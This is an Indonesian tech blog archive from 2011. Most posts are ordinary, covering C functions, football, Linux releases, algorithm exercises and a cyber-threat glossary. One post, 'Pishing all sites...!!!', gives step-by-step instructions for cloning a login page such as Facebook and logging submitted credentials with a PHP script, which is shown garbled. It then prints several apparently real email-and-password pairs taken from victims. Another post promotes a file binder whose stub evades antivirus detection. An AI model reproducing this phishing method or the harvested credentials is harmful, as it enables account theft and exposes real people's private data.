Thursday, December 1, 2011

Jenis Fungsi pada bahasa C dan C++

,
jenis fungsi-fungsi pada bahasa C maupun C++ :
1. fungsi yang tidak punya input dan tidak punya output
2. fungsi yang tidak punya input tetapi punya output
3. fungsi yang punya input tetapi tidak punya output
4. fungsi yang punya input dan punya output

jenis fungsi pada bahasa C dan C++ menurut nilai kembalian yang dihasilkan :
1. fungsi yang mempunyai nilai kembalian :
a. fungsi yang tidak punya input tetapi punya output

Code:
sintaks umum :

tipe_data nama_fungsi ()
{
    statemen1;
    statemen2;
    ...
}

contoh :

Code:
int show_number()
{
    int a = 1;
    return (a);
}

fungsi return() di bawah ini menunjukkan kalau fungsi di atas mempunyai nilai kembalian

b. fungsi yang punya input dan punya output

Code:
sintaks umum :

tipe_data nama_fungsi(tipe_data nama_variabel)
{
    statemen1;
    statemen2;
    ...
}

contoh :

Code:
int show_number(int a)
{
    a = 1;
    return (a);
}

- kalau di dalam tanda kurung memiliki variabel, berarti fungsi tersebut     mempunyai input

2. fungsi yang tidak memiliki nilai kembalian
a. fungsi yang tidak punya input dan tidak punya output

Code:
sintaks umum :

void nama_fungsi()
{
    statemen1;
    statemen2;
    ...
}

- tipe data void menandakan bahwa fungsi tersebut tidak memiliki nilai kembalian

contoh :

Code:
void tampilkan_pesan()
{
    printf("ini fungsi\n");
}

b. fungsi yang punya input tetapi tidak punya output

Code:
sintaks umum :

void nama_fungsi(tipe_data variabel)
{
    statemen1;
    statemen2;
    ...
}

contoh :

Code:
void tampilkan_angka(int a)
{
    a = 1;
    printf("%d\n", a);
}
Sumber
Read more

Wednesday, November 23, 2011

Manchester United F.C.

,
Manchester United
Logo Manchester United
Nama lengkap Manchester United Football Club
Julukan The Red Devils[1]
Didirikan 1878, dengan nama Newton Heath LYR F.C.
Stadion Old Trafford
(Kapasitas: 75.957[2][3])
Pemilik Bendera Amerika Serikat Keluarga Glazer
Wakil ketua Bendera Amerika Serikat Joel dan Avram Glazer
Manajer Sir Alex Ferguson
Liga Liga Utama Inggris
2010–11 Liga Utama Inggris, ke-1
Situs web Situs web resmi klub

Manchester United F.C. (biasa disingkat Man Utd, Man United atau hanya MU) adalah sebuah klub sepak bola papan atas di Inggris yang berbasis di Old Trafford, Manchester,
Dibentuk sebagai Newton Heath L&YR F.C. pada 1878 sebagai tim sepak bola depot Perusahaan Kereta Api Lancashire dan Yorkshire Railway di Newton Heath, namanya berganti menjadi Manchester United pada 1902.
Meski sejak dulu telah termasuk salah satu tim terkuat di Inggris, barulah sejak 1993 Manchester United meraih dominasi yang besar di kejuaraan domestik di bawah arahan Sir Alex Ferguson - dominasi dengan skala yang tidak terlihat sejak berakhirnya era Liverpool F.C. pada pertengahan 1970-an dan awal 1980-an. Sejak bergulirnya era Premiership di tahun 1992, Manchester United adalah tim yang paling sukses dengan dua belas kali merebut trofi juara.
Meskipun sukses di kompetisi domestik, kesuksesan tersebut masih sulit diulangi di kejuaraan Eropa; mereka hanya pernah meraih juara di Liga Champions tiga kali sepanjang sejarahnya (1968, 1999, 2008).
Sejak musim 86-87, mereka telah meraih 22 trofi besar - jumlah ini merupakan yang terbanyak di antara klub-klub Liga Utama Inggris. Mereka telah memenangi 19 trofi juara Liga Utama Inggris (termasuk saat masih disebut Divisi Satu). Pada tahun 1968, mereka menjadi tim Inggris pertama yang berhasil memenangi Liga Champions Eropa, setelah mengalahkan S.L. Benfica 4–1, dan mereka memenangi Liga Champions Eropa untuk kedua kalinya pada tahun 1999 dan sekali lagi pada tahun 2008 setelah mengalahkan Chelsea F.C. di final. Mereka juga memegang rekor memenangi Piala FA sebanyak 11 kali.[4] Pada 2008, mereka menjadi klub Inggris pertama dan klub Eropa kedua yang berhasil menjadi Juara Dunia Antarklub FIFA.
Pada 12 Mei 2005, pengusaha Amerika Serikat Malcolm Glazer menjadi pemilik klub dengan membeli mayoritas saham yang bernilai £800 juta (US$1,47 milyar) diikuti dengan banyak protes dari para pendukung fanatik.
Read more

Wednesday, November 9, 2011

Snow Leopard Transformation pack

,

 

Features

Snow Transformation Pack comes with the following main features below:
  • Add applications to emulate Snow Leopard features like Dock, Spaces, Shadow, etc.
  • Change default logon screen background to default Snow Leopard wallpaper
  • Change system branding logo to Snow Leopard
  • Change system configuration such as taskbar position to look close to Snow Leopard
  • Change system icons and graphics to Snow Leopard
  • Change system theme to Snow Leopard
  • And much more
Changes in Version 1.5
-Changed Dock application from RK Launcher to RocketDock with older StackDocklet for performance/stability (new configuration)
-Fixed Desktop Theme Enhancements being checked even they aren't checked from configuration
-Fixed FontSmoothingGamma value that breaks some applications like jDownloader
-Fixed reboot prompt to restore Windows Explorer shell if user choose not to reboot
-Fixed system files modification compatibilities with non-English edition OS
-Fixed x64 system files modification compatibilities


Download

You can download Snow Transformation Pack at WinXSoft.com/stp

Awards/Mirrors

 
Read more

Analisis algoritma

,

1.      2. Tn = 1/3 + 2/3 + 1 + 4/3 + …… + 1/3n
a.       Tentukan kompleksitas waktu
b.      Tentukan big O
Jawab :

       a). Tn = 1/3 + 2/3 + 1+ 4/3+………….+ 1/3 n
    Tn = 1/3 (1+2+3+4+………………….+ n)
    1/3. ½ n (n+1)
    1/6 n (n+1)
    1/6 n2 + 1/6 n
    Tn = O (n2)
b). 1/6 n2 + 1/6 n ≤ 1/6 n2 + 1/6 n2
       1/6 n2 + 1/6 n ≤ 1/3 n2
       C = 1/3 ,  n0= 1 ,   n ≥ 1
===============================================================
1.      3. Terdapat persoalan berikut:
Terdapat sekumpulan array bertipe integer, kemudian tentukan total nilainya.
a.       Jelaskan operasi dasarnya
b.      Buat algoritmanya
c.       Tentukan kompleksitas waktu
Jawab:

        a). Menjumlahkan semua nilai dari masing- masing array
b). tot ← 0
     for i  ← 1 to n do
          tot  ← tot + A [i]    O(1)
     endfor
c). Tn = n . O(1)
          = O (n)

Read more

Saturday, November 5, 2011

FILE JOINER 2.01

,


File Joiner is a tool that combines (binds) unlimited files (no matter their type) into a single standalone executable (a Container). The Container (the final bound file) is a simple compiled program that, when opened, will automatically launch the included files.

File Joiner can run any type of file from the bound file without affecting its direct functionality. For instance, if you bind an executable, a text file and an image file, when the Container file is run, the executable will be run too while the other files will be opened with the default image file viewer (IrfanView, Paint etc.) and text file viewer (Notepad, Wordpad etc.).


File Joiner features:


  • unlimited files can be bound (joined)

  • can bind any file type that is needed by the executable for a properly run

  • the joined files can be fully encrypted

  • the icon of the Host file (final bound file) can be changed either with one of the icons included in File Joiner or another one of your choice

  • small joiner "stub" size (~10 KB) - for instance, if you join a 100KB file with a 300KB file the size of the resulting bound file will be ~410KB

  • the joiner "stub" is undetected when scanned by most used antiviruses




  • download a Demo version here.
    Read more

    Thursday, November 3, 2011

    Coding Segitiga

    ,

    #include <stdio.h>
    #include <stdlib.h>

    int main(int argc, char *argv[])
    {
      int n,i,j,k,l;
      l=1;
      printf("masukan : ");scanf("%i",&n);
      for (i=n; i>=1; i=i-2)
      {      for (k=1;k<=l;k++)
                  printf(" ");
          for (j=1; j<=i; j++)
          {
              printf("*");
          }
          l++;
          printf("\n");
      }
      getch();   
      return 0;

    }
    Read more

    SARDU - Multiboot creator DVD & USB

    ,

    SARDU enables you to create a multiboot device (USB stick or other removable) containing your Utilities, Antivirus, Windows PE and Windows XP, Vista, Seven Installers with all Windows Recovery Disks.
    You can also import customized menus and customized folders and / or ISOs not directly supported.
    This makes SARDU infinitely complete and customizable.

    Multiple Antivirus

    After downloading the ISO images, with SARDU you can use the engine of more than ten of antivirus (one at time) to remove malware, viruses or others malicious software. This multiple antivirus rescue disc utility considers a great computer troubleshooting tools if your computer can't be start or if is damaged.

    Hundreds of Utilities

    You can create, recover, repair, resize and merge partitions, clone a disk, make an image, recover or change lost passwords; run floppy-based diagnostic tools from a DVD or USB stick, recover and save lost photos and documents, and test hardware items such as RAM and hard disks, etc.
    All do you need for troubleshooting.

    Multiple Linux

    You can try the best Linux Live distro's by loading the file system images into RAM so nothing is written to your hard disk, so you can turn your PC to a Media Player, or test your LAN or Wi-Fi security using your USB pen-drive or DVD.
    You can use modular distributions such as Slax, xPUD, (K)Ubuntu, Fedora, Mint or others from the same USB Flash Drive or DVD.

    Multiple Windows installer or PE or Recovery Disk

    You can boot from DVD or USB using 'Windows Live' (Windows PE), so you can perform the recovery of your Windows XP, Vista or Win. 7 installations, install Windows XP and all Service Packs, Windows Vista or Windows Seven all from the one DVD or USB. Using the USB media for installation of an operating system takes advantage of greater speed compared to the slower DVD. You can install operating systems without needing a CD or DVD player. This is the best solution for netbooks.

    Downloads SARDU 2.0.3
    Read more

    Slackware

    ,
    What is Slackware Linux?
    The Official Release of Slackware Linux by Patrick Volkerding is an advanced Linux operating system, designed with the twin goals of ease of use and stability as top priorities. Including the latest popular software while retaining a sense of tradition, providing simplicity and ease of use alongside flexibility and power, Slackware brings the best of all worlds to the table.

    Originally developed by Linus Torvalds in 1991, the UNIX®-like Linux operating system now benefits from the contributions of millions of users and developers around the world. Slackware Linux provides new and experienced users alike with a fully-featured system, equipped to serve in any capacity from desktop workstation to machine-room server. Web, ftp, and email servers are ready to go out of the box, as are a wide selection of popular desktop environments. A full range of development tools, editors, and current libraries is included for users who wish to develop or compile additional software.

    The Slackware Philosophy
    Since its first beta release in April of 1993, the Slackware Linux Project has aimed at producing the most "UNIX-like" Linux distribution out there. Slackware complies with the published Linux standards, such as the Linux File System Standard. We have always considered simplicity and stability paramount, and as a result Slackware has become one of the most popular, stable, and friendly distributions available.

    Slackware Overview
    Slackware Linux is a complete 32-bit multitasking "UNIX-like" system. It's currently based around the 2.6 Linux kernel series and the GNU C Library version 2.7 (libc6). It contains an easy to use installation program, extensive online documentation, and a menu-driven package system. A full installation gives you the X Window System, C/C++ development environments, Perl, networking utilities, a mail server, a news server, a web server, an ftp server, the GNU Image Manipulation Program, Mozilla Firefox, plus many more programs. Slackware Linux can run on 486 systems all the way up to the latest x86 machines (but uses -mcpu=i686 optimization for best performance on i686-class machines like the P3, P4, Duron/Athlon, and the latest multi-core x86 CPUs).

    Download mirrors.kernel.org
    or
    Torrents for Slackware 13.37, 32-bit x86
    Slackware 13.37 x86 Install ISO disc 1 (A/AP/D/E/L/N, bootable installer, kernels, testing/, Slackbook)
    Slackware 13.37 x86 Install ISO disc 2 (F/K/T/TCL/X/XAP/Y, L source, /testing kernel source)
    Slackware 13.37 x86 Install ISO disc 3 (KDE, A/AP/E/F/installer source)
    Slackware 13.37 x86 Install ISO disc 4 (KDEI, /extra packages, source for D)
    Slackware 13.37 x86 ISO disc 5 (KDE/XAP source)
    Slackware 13.37 x86 ISO disc 6 (/pasture packages, K/N/T/TCL/X/Y source, USB and PXE installers)
    Slackware 13.37 x86 DVD ISO (everything)
    Torrent for Slackware 13.37, 64-bit x86_64 Slackware 13.37 x86_64 DVD ISO (everything)
     
    Read more

    Thursday, October 27, 2011

    Tema Android untuk Windows 7

    ,
    Dengan menggunakan themepack Android ini, tampilan windows 7 kamu akan nampak seperti Android. tapi themepack ini hanya bisa digunakan untuk Windows 7, belum tersedia untuk Windows XP atau Vista.







    gimana? bagus kan...  kalo mau coba silahkan langsung aja sedot :D
    32bit
    64bit
    Read more

    Wednesday, October 26, 2011

    Ubuntu 11.10 Oneiric Release

    ,
    Bagi pecinta Linux Ubuntu pasti sangat berbahagia dengan berita ini. Karena tepat tanggal 15 Oktober 2011 Ubuntu secara resmi merilis Ubuntu 11.10 dengan codename Oneiric. Dan saya sebagai pengguna setia Ubuntu langsung menggupradenya, tapi apa daya koneksi internet saya tidak sanggup jadi butuh 2 hari untuk downloadnya .
    Berikut beberapa tampilan Ubuntu 11.10.


    Dapat didownload disini
    Selamat mencoba dan menggunakan Ubuntu 
    Read more

    Wednesday, September 7, 2011

    Memasang kernel 3.0.0 di Ubuntu Natty

    ,
    Setelah di rilis oleh Linuz trovalds kernel 3.0 sudah mendarat di Oneiric, namun sayangnya ooneiric belum dirilis hingga saat ini :( . Berbekal modal nekat dan mumpung punya waktu luang, akhirnya saya membackport kernel 3.0 ke natty. Sebenarnya ini untuk LTS yaitu lucid, namun setelah saya test semua berjalan dengan lancar. Berikut adalah cara memasang kernel tersebut dari PPA saya.
    $ sudo add-apt-repository ppa:udienz/lucid-bpo
    
    $ sudo apt-get update
    
    $ sudo apt-get install linux-headers-3.0.0-8-generic linux-image-3.0.0-8-generic
    
    $ sudo reboot
    Done! Gampang kan? untuk memastikan silakan cek dengan perintah uname -a
    ~ $ uname -a
    Linux cvbn45 3.0.0-8-generic #11~natty1-Ubuntu SMP Tue Aug 23 20:03:27 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
    ~ $
    Atau cek di system monitor :) Selamat anda sudah memasang kernel 3.0!

    Article source
    Read more

    Ancaman-Ancaman Dunia Cyber

    ,
    Kebutuhan kita untuk mendapatkan informasi melalui internet saat ini semakin tinggi. Namun, masih banyak yang belum menyadari akan ancaman atau serangan apabila kita menggunakan IT. Kita baru sadar setelah data menjadi hilang, terkena virus, spyware, spam bahkan sampai komputer menjadi rusak dan tidak bisa digunakan lagi. Saat ini berbagai serangan terhadap jaringan komputer dan internet semakin banyak dan berkembang. Serangan tidak hanya terhadap invidivu tertentu.
    Ada serangan yang sengaja dilakukan oleh seseorang atau kelompok tertentu terhadap suatu perusahaan/lembaga untuk kepentingan pribadi mereka. Masih lemahnya sistem suatu perusahaan membuat mereka semakin berkembang dalam membuat teknik serangan-serangan baru. Berikut ini macam – macam ancaman atau serangan dari penggunaan IT :
    1. Botnet
    Deskripsi:
    - Terdiri dari dua kata, yaitu BOT (program yang otomatis) dan Net Networking). Jadi botnet merupakan program yang secara otomatis, bekerja dalam network tertentu yang bertujuan untuk mendapatkan “sesuatu” secara brutal, karena semua komputer yang terhubung dalam jaringan akan diserang semuanya secara otomatis.
    - Contoh: conficker.vmx. Botnet ini sulit sekali dihilangkan, karena mempunyai fitur autoupdate ke server yang ditunjuk, sehingga conficker ini sulit dilacak dan dihilangkan.
    2. Memaksa masuk (Brute Force) dan kamus password (Dictionary)
    Deskripsi:
    - Menyerang database atau menyerang login prompt yang sedang aktif.
    - Brute Force: upaya menemukan password dari account user dengan cara sistematis, mencoba berbagai kombinasi angka, huruf dan simbol.
    - Dictionary: upaya menemukan password dengan mencoba berbagai kemungkinan password yang dipakai user dengan kamus password yang sudah didefinisikan sebelumnya.Cara mengatasi:
    - Aturan pembuatan password yang kuat, misalnya tidak boleh menggunakan tanggal lahir, nama, password dengan kombinasi huruf dana angka
    3. Denial of Service (DoS)
    Deskripsi:
    - Membuat layanan jaringan jadi mampet.
    - Bentuk: mengirim paket data yang besar terhadap suatu server dan memanfaatkan celah yang rentan dari sistem operasi, layanan-2 atau aplikasi-2.
    - Akibat serangan: sitem crash atau pemakaian CPU 100 %.
    - Jenis-jenis DoS: Distributed Denial of Service (DSoS), Distributed Reflective Denial of Service (DRDoS).
    - Contoh akibat serangan: layanan pemesanan selalu gagal atau username tidak bisa login, daftar barang tidak bisa muncul atau sudah dicetak.
    4. Identity Teft
    Deskripsi:
    - Pencurian informasi tentang identitas kita yang dilakukan melalui komputer offline, jaringan LAN, internet maupun melalui transaksi-transaksi dalam kehidupan sehari-hari.
    5. Smurf Attack
    Deskripsi:
    - Membanjiri komputer client dengan sampah.
    - Mengirimkan broadcast kepada segmen jaringan sehingga semua node dalam jaringan akan menerima paket broadcast.
    - Ada yang menggolongkan sebagai DoS.
    6. Ping of Death
    Deskripsi:
    - Menggunakan tool khusus dengan mengirimkan paket ping oversized yang banyak sekali kepada korbannya.
    - Akibatnya: sistem crash, freeze atau reboot.
    - Ada yang menggolongkan sebagai DoS.
    7. Stream Attack
    Deskripsi:
    - Mengirim jumlah paket besar menuju port pada sistem korban menggunakan sumber nomor yang random.
    - Ada yang menggolongkan sebagai DoS.
    8. Spoofing
    Deskripsi:
    - Seni untuk menjelma menjadi sesuatu yang lain.
    - IP address atau node source yang asli diganti IP address atau node source yang lain.
    - Contoh: pemalsuan web Paypal
    9. Serangan Pembajakan (Man in the Middle)
    Deskripsi:
    - Mengkomposisikan dua titik link komunikasi dengan jalan: menyusup antara dua party dan para penyerang memposisikan dirinya dalam garis komunikasi dimana dia bertindak sebagai proxy atau mekanisme store and forward.
    - Akibat: para penyerang bisa menangkap logon credensial atau data sensitive ataupun mampu mengubah isi pesan dari kedua titik komunikasi.
    10. Spamming
    Deskripsi:
    - Spam merupakan email/newsgroup/pesan diskusi forum yang tak diundang.
    - Berupa iklan dari vendor atau bisa berisi kuda Trojan.
    - Biasanya datang bertubi-tubi tanpa diminta dan sering kali tidak dikehendaki oleh penerimanya.
    - Mirip dengan DoS.
    - Cara kerja: pembuat spam akan membuat mailing list dari alamat-alamat email yang ditemukan dari situs-situs terkenal seperti Facebook, Multiply, Friendster dll. Setelah itu file-file akan disebarkan melalui email-email tersebut.
    11. Sniffer (Snooping Attact)
    Deskripsi:
    - Kegiatan user perusak yang ingin mendapatkan informasi atau traffic melalui jaringan.
    - Merupakan program penangkap paket data yang bisa di duplikasikan isi paket yang melalui media jaringan ke dalam file.
    - Fokus untuk mendapatkan logon credensial, kunci rahasia, password dan lainnya.
    - Contoh: menyadap suatu pengiriman program saat memasukkan password dengan tujuan mendapatkan password pengguna atau menduplikasikan program yang dikirimi program.
    12. Crackers
    Deskripsi:
    - User yang ingin merusak sistem.
    - Akibat: kegiatan pencurian data/ide, disable system, kompromi keamanan, opini negative public, kehilangan pasar saham, mengurangi keuntungan, kehilangan produktivitas.
    - Contoh: seorang pencopy software seperti microsoft.
    - Keahlian minimal cracker: bisa membuat program C, C++, atau Perl, memiliki pengetahuan TCP/IP, menguasai sistem operasi UNIX atau VMS, suka mengkoleksi software dan hardware lama.
    13. Hacker
    Deskripsi:
    - Seseorang atau beberapa orang yang ahli dan mengetahui seluk beluk komputer, baik, software, hardware, keamanan atau jaringannya. Sesungguhnya tidak semua hacker melakukan kejahatan, ada hacker yang berfungsi sebagai peneliti dan pengembang dengan cara menelusuri lubang-lubang keamanan sebuah software atau jaringan komputer.
    14. Back Door
    Deskripsi:
    - Serangan dengan sengaja membuka suatu “pintu belakang” bagi pengunjung tertentu, tanpa disadari oleh orang yang menginstall software.
    - Contoh: E-bay untuk mengizinkan pengembang tersebut memperoleh informasi mengenai transaksi yang terjadi antara pembeli dan penjual, termasuk kartu kredit.
    15. Social Engineering
    Deskripsi:
    - Bentuk serangan yang memanfaatkan sisi kelemahan manusia, misalnya dengan merekayasa perasaan user sehingga user bersedia mengirim informasi kepada hacker untuk selanjutnya digunakan untuk merusak sistem.
    - Misalnya: email yang meminta target untuk membuak attachment yang disisipi worm/trojan horse untuk merusak jaringan.
    16. DNS Poisoning
    Deskripsi:
    - Usaha merubah atau merusak isi DNS sehingga semua akses yang memakai DNS akan disalurkan ke alamat yang salah atau alamat yang dituju tidak bisa diakses.
    - User melakukan login ada rekening internetnya. Karena sudah dialihkan, maka ia mengakses ke suatu situs palsu yang serupa dan telah dipersiapkan oleh hacker.
    17. Phising Mail
    Deskripsi:
    - Email yang seolah-olah dikirim dari bank tempat kita menyimpan uang, dari situs tempat kita membeli barang secara online. Bila kita log ini ke dalam situs gadungan tersebut maka situs itu akan mencuri username dan password yang akan merugikan kita.
    - Berasal dari bahasa Inggris yang berari pengelabuhan. Phishing berupa webpage yang alamatnya mirip dengan web aslinya. Misalnya: www.klikbca.com diubah menjadi www.clickbca.com atau www.klikkbca.com. Jika dilihat ketiganya memiliki pelafalan yang sama, tetapi tujuannya berbeda. Klik BCA bertujuan untuk mengakses suatu alamat bank swasta di Indonesia, tetapi click BCA bertujuan ke suatu komputer dimana pemiliknya mengetahui username dan password Anda jika Anda memasuki web tersebut.
    18. Adware
    Deskripsi:
    - Kependekan dari advertising software, yaitu sebuah program untuk mengiklankan sesuatu yang dapat secara otomatis tampil dalam web browser atau pop up.
    - Adware bisa terdownload tanpa sengaja bila kita tidak teliti saat mengeklik iklan yang tampil dalam sebuah pop-up.
    - Ada yang menyamakan dengan spyware.
    19. Virus dan Worm
    Deskripsi:
    - Program komputer aktif yang tersembunyi dan membahayakan, karena bersifatt merusak sistem komputer. Virus dapat menginfeksi program komputer lain atau file data serta dapat terdistribusi ke komputer lain dengan membonceng pendistribusian file/program lain.
    20. Spyware
    Deskripsi:
    - Merupakan program komputer yang biasanya tanpa sengaja terinstall untuk melakukan perusakan, penyalinan dan/atau pengintipan aktifitas sebuah komputer, sehingga segala aktifitas saat menggunakan komputer dapat dipantau, dicopy dari tempat lain. Spyware biasanya terinstall karena ketidaktelitian pengguna komputer saat menegklik suatu pop-up atau browsing internet
    21. Remote Attack
    Deskripsi:
    - Segala bentuk serangan terhadap suatu sistem dimana penyerangannya tidak memiliki kendali terhadap mesin tersebut karena dilakukan dari jarak jaruh di luar sistem jaringan atau media transmisi.
    22. Hole
    Deskripsi:
    - Kondisi dari software atau hardware yang bisa diakses oleh pemakai yang memiliki otoritas atau meningkatnya tingkat pengaksesan tanpa melalui proses otoritasi.
    23. Phreaking
    Deskripsi:
    - Perilaku menjadikan pengamanan telepon melemah.
    24. Wireless Attack
    Deskripsi:
    - Biasanya berbentuk pencurian bandwidth
    25. HTTPD Attack
    Deskripsi:
    - Memanfaatkan kerawanan webserver, misalnya: buffer, overflows, httpd bypasses, cross scripting, web code vulnerabilities, URL floods.
    - Contoh: melalui cross XSS seorang attacker bisa mengeksploitasi pertukaran cookies antara browser dan webserver. Fasilitas ini dapat mengaktifkan script untuk merubah tampilan web dll. Script ini bisa menjalankan malware, membca informasi penting dan mengexpose data sensitive seperti nomor credit card dan password.
    26. Pencurian Cookie
    Deskripsi:
    - Cookie adalah kumpulan data yang dikirimkan oleh server atau admin sebuah website kepada webbrowser yang digunakan. Kemudian web browser akan mengembalikan lagi data tersebut untuk mengakses website tanpa ada perubahan sedikitpun.
    - Kenapa berbahaya ? Untuk mengakses sbuah situ dibutuhkan transfer cookie dari user ke server dan sebaliknya, sebagai proses authentifikasi dan enkripsi data sekaligus konfirmasi identitas user. Sehingga jika cookie dicuri, maka pencuri dapat menggunakan cookie tersebut untuk mengakses situs ilegal maupun memalsukan identitasnya.
    - Pencurian cookie dapat menggunakan script.


    Source: Blackc0de
    Read more

    Pishing all sites...!!!

    ,
    Langsung aja, cekibrot :

    1. Niat
    2. Harus punya domain & hostingan sendiri (boleh free / premium)
    3. Cari site yang mau di pishing
    4. Terus liat SC nya (Ctrl+u / klick kanan - view page sourch)
    5. di save sebagai index.htm
    6. buka index.htm tadi, lalu cari action=, nanti akan ketemu seperti ini
    PHP Code:
    form action="site yang kita pishing" method="post"
    7
    . Ganti url "site yang kita pishing" menjadi "write.php" & "post" menjadi "get"
    8. lalu saveLangkah selanjutnya
    ~ bikin write.php di notepad
    ~ lalu copas code ini :
    PHP Code:
    $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>

    ~ lalu save sebagai "write.php"
    ~ ubah http://bebas menjadi site yg kita pishing Contoh : http://facebook.com (supaya keliatan kayak FB asli) kwokwokowow ngakak

    Langkah akhir :
    ~ Upload ke 2 file tersebut ke hostingan & di simpan di directori yg sama

    NB :
    ~ Apabila tidak ada file passwords.txt, silahkan buat sendiri & taruh di host (biasanya suka ada otomatis)
    ~ Chmod passwords.txt ke 777

    Hasil nya akan seperti ini :
    PHP Code:
    charset_test=€,´,€,´,æ°´,Д,Є
    lsd=Vgv-w
    locale=id_ID
    email=ryanankgokil@yahoo.com
    pass=oyonthita
    default_persistent=0


    charset_test=€,´,€,´,æ°´,Д,Є
    lsd=Vgv-w
    locale=id_ID
    email=adiitrikudo@yahoo.com
    pass=aditsinaga
    default_persistent=0

    charset_test=€,´,€,´,æ°´,Д,Є
    lsd=Vgv-w
    locale=id_ID
    email=coeberman@ymail.com
    pass=cubercanibalmegacanibal77
    default_persistent=0

    charset_test=€,´,€,´,æ°´,Д,Є
    lsd=Vgv-w
    locale=id_ID
    email=yunitavera56@yahoo.co.id
    pass=yunitart5
    default_persistent=0

    charset_test=€,´,€,´,æ°´,Д,Є
    lsd=Vgv-w
    locale=id_ID
    email=dwyansapoetra
    pass=4926987
    default_persistent=0

    charset_test=€,´,€,´,æ°´,Д,Є
    lsd=Vgv-w
    locale=id_ID
    email=annisa.nurfitri92@yahoo.com
    pass=chadensta
    default_persistent=0
    Read more

    Lucid Desktop (Sistem Operasi Berbasis Web)

    ,
    Gara-gara javascript framework seperti jquery, hal yang tidak mungkin dari PHP menjadi sesuatu yang mungkin. Konsep yang gila sekalipun bisa jadi sesuatu yang nyata. Salah satu konsep gila adalah, membuat sistem operasi berbasis web dengan PHP dan javascript framework, Lucid Desktop adalah sistem operasi open source berbasis web yang di buat menggunakan MySQL dan Javascript Framework.

    Lucid Desktop merupakan sistem operasi yang multi user, dan tentunya memiiliki modul untuk membuat aplikasi dan menginstallnya untuk dapat digunakan di sistem operasi ini. Standarnya aplikasi yang sudah terinstall dalam sistem operasi berbasis web ini adalah text editor, calculator, image viewer, simple games, web browser, feed reader, music player dan lain lain, tampilannya benar-benar linux gnome sekali kalo menurut ane om.

    Yang menariknya adalah file managernya sangat mantap, dengan file manager layaknya windows eplorer anda dapat menambahkan, edit, dan delete file ataupun folder, benar-benar keren, yang lebih hebat lagi, lucid pun memiliki fitur untuk update OS dengan versi yang paling akhir.

    ingin mencobanya gan ?? Klik saja http://www.lucid-desktop.org/demo/

    atau ingin mendownloadnya ? http://www.lucid-desktop.org/download/

    source : blackc0de
    Read more

    PERBEDAAN STANDBY, SHUTDOWN, DAN HIBERNATE

    ,

    Di dalam SISTEM OPERASI WINDOWS, disediakan 3 pilihan untuk menentukan keadaan KOMPUTER ( COMPUTER STATE ), yaitu :
    1. STANDBY
    2. SHUTDOWN
    3. HIBERNATE
    Hanya saja tidak semua orang tahu keadaan apa yang terjadi pada KOMPUTER ketika kita memilih salah satu dari tiga pilihan diatas. Berikut akan dijelaskan PERBEDAAN antara ke-tiga pilihan diatas :

    1. STANDBY

    Ketika kita memilih MENU ini, WINDOWS akan membuat keadaan komputer dalam keadaan HEMAT ENERGI. Hemat energi disini maksudnya adalah, KOMPUTER dinyalakan dengan menggunakan LISTRIK SEMINIM MUNGKIN. Hal yang biasa terjadi ketika komputer dalam keadaan STANDBY adalah monitor dalam keadaan mati ( tidak menampilkan gambar ). Pada keadaan STANDBY, komputer menunggu respon dari USER agar kembali seperti semula atau kembali ke keadaan NORMAL. Responnya diantara lain adalah gerakan MOUSE dan AKSES KEYBOARD ( kita menekan tombol di keyboard ).

    2. SHUTDOWN

    Pilihan SHUTDOWN sepertinya semua orang sudah tau fungsi dan apa yang terjadi pada komputer ketika kita memilih pilihan ini. Komputer akan mati ( off ) ketika kita memilih SHUTDOWN. SEMUA memory volatile akan hilang karena tidak ada listrik yang menyala ( contohnya RAM ).

    3. Hibernate

    Pilihan HIBERNATE membuat komputer mati ( off ) seperti pada pilihan SHUTDOWN. Namun ada yang berbeda dalam pilihan ini, yaitu sebelum komputer dalam keadaan off, memori-memori yang ada di RAM ( VOLATILE MEMORY ), di copy semua ke dalam HARDISK ( NON-VOLATILE MEMORY ). Maksud dari pernyataan ini adalah semua aktifitas kita ( memori-memori aplikasi yang sedang kita buka, seperti word dll ) akan disimpan dalam HARDISK. Dan ketika kita nyalakan kembali KOMPUTER kita, RAM akan meminta kepada HARDISK memori-memori yang tadi tersimpan, sehingga nantinya booting akan lebih cepat karena RAM sudah memiliki memori yang dibutuhkan untuk masuk ke WINDOWS. Juga aplikasi-aplikasi yang tadi kita gunakan ( sebelum di-HIBERNATE ) akan langsung terbuka begitu masuk ke WINDOWS.

    Article source
    Read more

    Download BackTrack 5 (Revolution)

    ,
    BackTrack 5, distribusi Linux yang paling ditunggu di dunia telah resmi dirilis kemarin.

    Dijuluki Revolution, BackTrack 5 kini didasarkan pada Ubuntu 10.04 LTS (Lucid Lynx), ditenagai kernel Linux 2.6.38 yang telah dipatch dengan semua patch wireless injection yang relevan dan memuat beberapa perbaikan besar.

    “The BackTrack Dev team has worked furiously in the past months on BackTrack 5, code name “revolution”. Today, we are proud to release our work to the public, and then rest for a couple of weeks.”

    “This new revision has been built from scratch, and boasts several major improvements over all our previous releases.” – Dinyatakan dalam pengumuman rilis.

    Rangkuman BackTrack 5:
    • Berdasarkan Ubuntu 10.04 LTS;
    • Kernel Linux 2.6.38 (dengan patch wireless injection);
    • KDE 4.6;
    • GNOME 2.6;
    • Mendukung arsitektur 32-bit dan 64-bit;
    • Metasploit 3.7.0;
    • Forensics mode;
    • Stealth mode (tanpa menggenerate lalulintas jaringan);
    • Initial ARM image of BackTrack (untuk perangkat Android);
    • Dan banyak lagi lainnya…
    BackTrack 5 – Screenshot

    https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEia3OfLmBkTsHGusfq1Wak4HU0RNYWf5HCkCbEV6Z_9XhlHaJ3T0_lY5sYl3FK3acTjlUmZaakABkjFjfPSz88cghvIXoSTB1LSs6kYT5iig8UzUOul6rfbN2Nq3ooxsR2yTfjg75TDauY/s400/bt5-0.png

    Bagi pengguna BackTrack 4 dipastikan harus segera mengupgrade ke versi baru ini, karena mulai 10 Mei 2011, BackTrack 4 tidak lagi mendapat dukungan teknis.

    BackTrack 5 – Distribusi Pengujian Penetrasi dari Offensive Security pada Vimeo.

    Tentang BackTrack

    BackTrack adalah distribusi Live DVD Linux populer yang berfokus pada pengujian penetrasi sistem dan jaringan, menampilkan analisis dan aplikasi diagnostik yang dapat dijalankan langsung dari CD. BackTrack berasal dari distribusi Whax dan Auditor Security Collection, menggabungkan yang terbaik dari keduanya dalam satu solusi lengkap.

